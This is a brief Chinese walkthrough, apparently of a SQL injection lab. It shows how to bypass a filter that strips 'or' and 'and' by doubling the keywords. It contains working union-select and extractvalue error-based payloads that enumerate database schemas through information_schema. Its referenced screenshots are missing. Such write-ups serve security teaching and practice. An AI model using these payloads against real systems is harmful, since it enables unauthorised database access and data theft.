按照常规输入id=1’ 提示报错信息如下：

一个很常见的报错，可以看出是单引号闭合的语句。
输入：id=-1’ or 1 --+

报出的错误信息不明显，加入一个括号进行试探能不能报出更多的语句错误。
输入：id=-1’) or 1 --+

从上图看出来or 被屏蔽了，经过更多的试探知道and 也被屏蔽了
通过更多的试探发现union select --+ # 没有被屏蔽。
然后使用联合查询进行注入，但是，出现了一个错误。
输入：id=-1’ union select table_schema from information_schema.schemata --+
报错信息如下：

发现information中的or 被屏蔽了，。。
然后把or 中的小写换大写都换了一遍 发现还是不行。
最后输入：id=-1’ union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+
发现正确注入：

其实知道这种套路之后便可以有更多的方法注入。。就算注释符被屏蔽也可以进行注入。
输入：id=1’ aandnd extractvalue(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1))) anandd ‘1’='1